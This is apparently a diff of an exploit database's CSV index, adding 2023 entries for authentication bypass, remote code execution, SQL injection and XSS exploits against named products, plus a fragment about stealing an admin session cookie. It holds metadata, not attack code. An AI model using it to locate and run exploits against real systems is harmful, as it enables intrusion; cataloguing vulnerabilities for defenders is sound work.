stolen an admin user session cookie to perform account takeover.

40
files_exploits.csv
View file

@ -3802,6 +3802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27892,exploits/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",remote,hardware,,2006-05-17,2013-08-27,1,CVE-2006-2490;OSVDB-25621,,,,,https://www.securityfocus.com/bid/18022/info
20892,exploits/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String",2001-03-25,"Jacek Lipkowski",remote,hardware,,2001-03-25,2012-08-28,1,CVE-2001-0380;OSVDB-8817,,,,,https://www.securityfocus.com/bid/2802/info
50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",2022-08-01,"Momen Eldawakhly",remote,hardware,,2022-08-01,2022-08-01,0,,,,,,
51444,exploits/hardware/remote/51444.txt,"Optoma 1080PSTX Firmware C02 - Authentication Bypass",2023-05-23,"Anthony Cole",remote,hardware,,2023-05-23,2023-05-23,0,CVE-2023-27823,,,,,
8096,exploits/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",remote,hardware,,2009-02-22,,1,OSVDB-52370,,,,,
21699,exploits/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",remote,hardware,,2002-08-09,2012-10-03,1,CVE-2002-0812;OSVDB-11315,,,,,https://www.securityfocus.com/bid/5436/info
51306,exploits/hardware/remote/51306.txt,"Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection",2023-04-06,LiquidWorm,remote,hardware,,2023-04-06,2023-04-06,0,,,,,,
@ -3860,6 +3861,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,,2016-03-03,2016-03-03,0,CVE-2016-2278,,,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",2022-07-29,LiquidWorm,remote,hardware,,2022-07-29,2022-07-29,0,,,,,,
51320,exploits/hardware/remote/51320.txt,"Schneider Electric v1.0 - Directory traversal & Broken Authentication",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-08,0,,,,,,
51455,exploits/hardware/remote/51455.py,"Screen SFT DAB 600/C - Authentication Bypass Account Creation",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
51458,exploits/hardware/remote/51458.py,"Screen SFT DAB 600/C - Authentication Bypass Admin Password Change",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
51457,exploits/hardware/remote/51457.py,"Screen SFT DAB 600/C - Authentication Bypass Erase Account",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
51456,exploits/hardware/remote/51456.py,"Screen SFT DAB 600/C - Authentication Bypass Password Change",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
51459,exploits/hardware/remote/51459.py,"Screen SFT DAB 600/C - Authentication Bypass Reset Board Config",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
51460,exploits/hardware/remote/51460.txt,"Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,,
37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,,
43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548
@ -4628,6 +4635,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46581,exploits/hardware/webapps/46581.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery",2019-03-20,"Kumar Saurav",webapps,hardware,80,2019-03-20,2019-03-20,0,CVE-2019-6282,"Cross-Site Request Forgery (CSRF)",,,,https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/
46580,exploits/hardware/webapps/46580.txt,"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control",2019-03-20,"Kumar Saurav",webapps,hardware,80,2019-03-20,2019-03-20,0,CVE-2019-6279,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/
48757,exploits/hardware/webapps/48757.txt,"PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)",2020-08-20,"İsmail ERKEK",webapps,hardware,,2020-08-20,2020-08-20,0,,,,,,
51448,exploits/hardware/webapps/51448.txt,"PnPSCADA v2.x - Unauthenticated PostgreSQL Injection",2023-05-23,"Momen Eldawakhly",webapps,hardware,,2023-05-23,2023-05-23,0,CVE-2023-1934,,,,,
17377,exploits/hardware/webapps/17377.txt,"Polycom IP Phone - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",webapps,hardware,,2011-06-09,2011-06-09,0,OSVDB-73117,,,,,
37449,exploits/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",webapps,hardware,,2015-06-30,2015-06-30,0,CVE-2015-4685;CVE-2015-4684;CVE-2015-4683;CVE-2015-4682;CVE-2015-4681;OSVDB-123783;OSVDB-123782;OSVDB-123780;OSVDB-123779;OSVDB-123778;OSVDB-123776,,,,,
41175,exploits/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",webapps,hardware,,2017-01-26,2017-01-26,0,,,,,,
@ -10304,6 +10312,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11029,exploits/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,local,multiple,,2010-01-05,,0,,,,,,
8067,exploits/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",local,multiple,,2009-02-15,,1,CVE-2009-0390,,,,,
10326,exploits/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Local Buffer Overflow",2009-02-03,"Wolfgang Hamann",local,multiple,,2009-02-02,2017-07-14,0,,,2009-12-05-34340.ps,,,
51469,exploits/multiple/local/51469.txt,"Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31873,,,,,
19430,exploits/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage",1999-07-25,"Pawel Wilk",local,multiple,,1999-07-25,2012-06-27,1,OSVDB-83457,,,,,https://www.securityfocus.com/bid/540/info
24923,exploits/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",local,multiple,,2013-04-08,2013-04-08,0,OSVDB-91982,,,,,http://www.senseofsecurity.com.au/advisories/SOS-13-001.pdf
39656,exploits/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,local,multiple,,2016-04-04,2016-04-04,0,CVE-2016-2087,,,,http://www.exploit-db.comhexchat-2.10.0.tar.xz,
@ -10441,6 +10450,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,,2018-10-26,2018-10-26,0,CVE-2018-14665,,,,,https://twitter.com/hackerfantastic/status/1055517801224396800
9985,exploits/multiple/local/9985.txt,"Xpdf 3.01 - Local Heap Overflow / Null Pointer Dereference",2009-10-17,"Adam Zabrocki",local,multiple,,2009-10-16,,1,,,,,,
9097,exploits/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink",2009-07-09,kingcope,local,multiple,,2009-07-08,,1,OSVDB-55971,,,,,
51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
@ -11551,6 +11561,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42324,exploits/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution",2017-07-07,"Vex Woo",webapps,multiple,,2017-07-14,2018-05-17,1,CVE-2017-9791;S2-048,,s2-048;Struts-048,,,https://github.com/nixawk/labs/blob/943764ccb3b36a419729062f23972fd0d726bd24/CVE-2017-9791/exploit_S2-048.py
44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,,2018-05-03,2018-05-03,1,CVE-2013-2251,,,,,
50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
51447,exploits/multiple/webapps/51447.py,"Apache Superset 2.0.0 - Authentication Bypass",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27524,,,,,
48143,exploits/multiple/webapps/48143.py,"Apache Tomcat - AJP 'Ghostcat File Read/Inclusion",2020-02-20,YDHCUI,webapps,multiple,,2020-02-27,2020-03-02,0,CVE-2020-1938,,,,,https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/8bd38f4cf22331ecf4e48096a78c5931509c26be/CNVD-2020-10487-Tomcat-Ajp-lfi.py
49039,exploits/multiple/webapps/49039.rb,"Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)",2020-11-13,SunCSR,webapps,multiple,,2020-11-13,2020-11-13,1,CVE-2020-1938,,,,,
10292,exploits/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,webapps,multiple,,2009-11-30,2010-07-09,1,,,,,http://www.exploit-db.comjakarta-tomcat-3.2.1.tar.gz,
@ -11757,6 +11768,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33731,exploits/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",webapps,multiple,,2010-03-10,2014-06-13,1,,,,,,https://www.securityfocus.com/bid/38634/info
9720,exploits/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,webapps,multiple,,2009-09-17,,1,OSVDB-58317;CVE-2009-3307;OSVDB-58316;OSVDB-58315,,,,,
43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7
51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
@ -12009,6 +12021,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
51452,exploits/multiple/webapps/51452.py,"PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27350,,,,,
35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
@ -13523,6 +13536,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6270,exploits/php/webapps/6270.txt,"Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",webapps,php,,2008-08-18,2016-11-17,1,CVE-2008-3719;OSVDB-47557,,,,,
5108,exploits/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,webapps,php,,2008-02-12,2016-11-14,1,OSVDB-41787;CVE-2008-0794,,,,http://www.exploit-db.comaffmarket.30.03.07.zip,
5114,exploits/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",webapps,php,,2008-02-13,2016-11-14,1,OSVDB-42852;CVE-2008-1177;OSVDB-42851;CVE-2008-1176,,,,http://www.exploit-db.comaffmarket.30.03.07.zip,
51468,exploits/php/webapps/51468.txt,"Affiliate Me Version 5.0.1 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
43265,exploits/php/webapps/43265.txt,"Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,0,CVE-2017-17598,"SQL Injection (SQLi)",,,,
42527,exploits/php/webapps/42527.txt,"Affiliate Niche Script 3.4.0 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php,,2017-08-21,2017-08-21,0,,,,,,
50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",2022-01-19,Vulnerability-Lab,webapps,php,,2022-01-19,2022-01-19,0,,,,,,
@ -14635,6 +14649,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9472,exploits/php/webapps/9472.txt,"Best Dating Script - Arbitrary File Upload",2009-08-18,jetli007,webapps,php,,2009-08-17,,1,,,,,,
51280,exploits/php/webapps/51280.txt,"Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-05-18,1,CVE-2023-0943,,,,,
51279,exploits/php/webapps/51279.txt,"Best pos Management System v1.0 - SQL Injection",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-04-06,0,,,,,,
51462,exploits/php/webapps/51462.py,"Best POS Management System v1.0 - Unauthenticated Remote Code Execution",2023-05-23,"Mesut Cetin",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,,2020-11-27,2020-12-01,0,CVE-2020-24963,,,,,
10655,exploits/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61372,,,,,
10685,exploits/php/webapps/10685.txt,"Best Top List 2.11 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
@ -14862,6 +14877,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
51476,exploits/php/webapps/51476.txt,"Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31698,,,,,
46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@ -15501,6 +15517,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
51397,exploits/php/webapps/51397.txt,"ChurchCRM v4.5.3 - Authenticated SQL Injection",2023-04-27,"Iyaad Luqman K",webapps,php,,2023-04-27,2023-05-07,1,CVE-2023-24685,,,,,
51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79456,,,,,https://www.securityfocus.com/bid/52115/info
36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79455,,,,,https://www.securityfocus.com/bid/52117/info
@ -15537,6 +15554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
11124,exploits/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,webapps,php,,2010-01-12,,1,,,,,http://www.exploit-db.comcivicrm-3.1.beta1-standalone.tar.gz,
35327,exploits/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",webapps,php,,2011-02-08,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46275/info
51478,exploits/php/webapps/51478.txt,"CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-25440,,,,,
34749,exploits/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,webapps,php,,2009-07-21,2014-09-23,1,CVE-2009-3509;OSVDB-56181,,,,,https://www.securityfocus.com/bid/43498/info
25623,exploits/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,webapps,php,,2005-05-06,2016-12-22,1,CVE-2005-1506;OSVDB-16159,,,,,https://www.securityfocus.com/bid/13533/info
6536,exploits/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,webapps,php,,2008-09-21,,1,OSVDB-48724;CVE-2008-4241,,,,,
@ -17356,6 +17374,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9235,exploits/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure",2009-07-23,NoGe,webapps,php,,2009-07-22,,1,,,,,,
8417,exploits/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,webapps,php,,2009-04-12,,1,OSVDB-53641,,,,,
7184,exploits/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' SQL Injection",2008-11-22,NoGe,webapps,php,,2008-11-21,2017-01-03,1,OSVDB-50171;CVE-2008-6114,,,,,
51449,exploits/php/webapps/51449.txt,"e107 v2.3.2 - Reflected XSS",2023-05-23,"Hubert Wojciechowski",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
24138,exploits/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - 'Log.php' HTML Injection",2004-05-21,Chinchilla,webapps,php,,2004-05-21,2013-01-15,1,CVE-2004-2028;OSVDB-6345,,,,,https://www.securityfocus.com/bid/10395/info
22958,exploits/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",webapps,php,,2003-07-25,2012-11-27,1,OSVDB-2305,,,,,https://www.securityfocus.com/bid/8279/info
22956,exploits/php/webapps/22956.txt,"e107 Website System 0.555 - 'db.php' Information Disclosure",2003-07-24,"Artoor Petrovich",webapps,php,,2003-07-24,2012-11-27,1,OSVDB-3856,,,,,https://www.securityfocus.com/bid/8273/info
@ -18255,7 +18274,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,webapps,php,,2010-05-26,,0,,,,,,
6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",webapps,php,,2008-07-10,2016-12-14,1,OSVDB-23864;CVE-2006-1278;OSVDB-23863,,,,http://www.exploit-db.comfilestore.zip,
12617,exploits/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",webapps,php,,2010-05-15,2017-07-14,0,OSVDB-55934,,file_thingie_v255_Jeremiah.zip,,,
51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach (grimlockx)",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach",webapps,php,,2023-05-05,2023-05-23,0,,,,,,
10689,exploits/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
11450,exploits/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,webapps,php,,2010-02-13,2017-11-15,0,,,,,,
30467,exploits/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php,,2007-08-09,2013-12-24,1,CVE-2007-4327;OSVDB-36425,,,,,https://www.securityfocus.com/bid/25253/info
@ -18979,6 +18998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery",2021-04-16,boku,webapps,php,,2021-04-16,2021-10-29,0,,,,,,
49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting",2021-04-23,boku,webapps,php,,2021-04-23,2021-11-01,0,,,,,,
48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,,2020-08-13,2020-08-13,0,,,,,,
51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-23,0,CVE-2022-41544,,,,,
4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,webapps,php,,2007-12-17,2016-10-20,1,OSVDB-44780;CVE-2007-6476;OSVDB-44779;CVE-2007-6475;OSVDB-41376;CVE-2007-6474;OSVDB-41375,,,,http://www.exploit-db.comGF-3XPLORER_2.4_.rar,
645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,,2004-11-20,,1,OSVDB-11626,,,,,http://www.zone-h.org/advisories/read/id=4904
25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",webapps,php,,2005-05-24,2013-05-24,1,CVE-2005-1752;OSVDB-16930,,,,,https://www.securityfocus.com/bid/13716/info
@ -22231,6 +22251,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31528,exploits/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-10,1,,,,,,https://www.securityfocus.com/bid/28423/info
5887,exploits/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,,1,OSVDB-46498;CVE-2008-2833,,,,,
36647,exploits/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,webapps,php,,2012-01-21,2015-04-06,1,CVE-2012-0932;OSVDB-78455,,,,,https://www.securityfocus.com/bid/51785/info
51471,exploits/php/webapps/51471.txt,"LeadPro CRM v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
11889,exploits/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,webapps,php,,2010-03-25,,1,OSVDB-63417;OSVDB-63416,,,,,
8576,exploits/php/webapps/8576.pl,"Leap CMS 0.1.4 - 'searchterm' Blind SQL Injection",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1613,,,,,
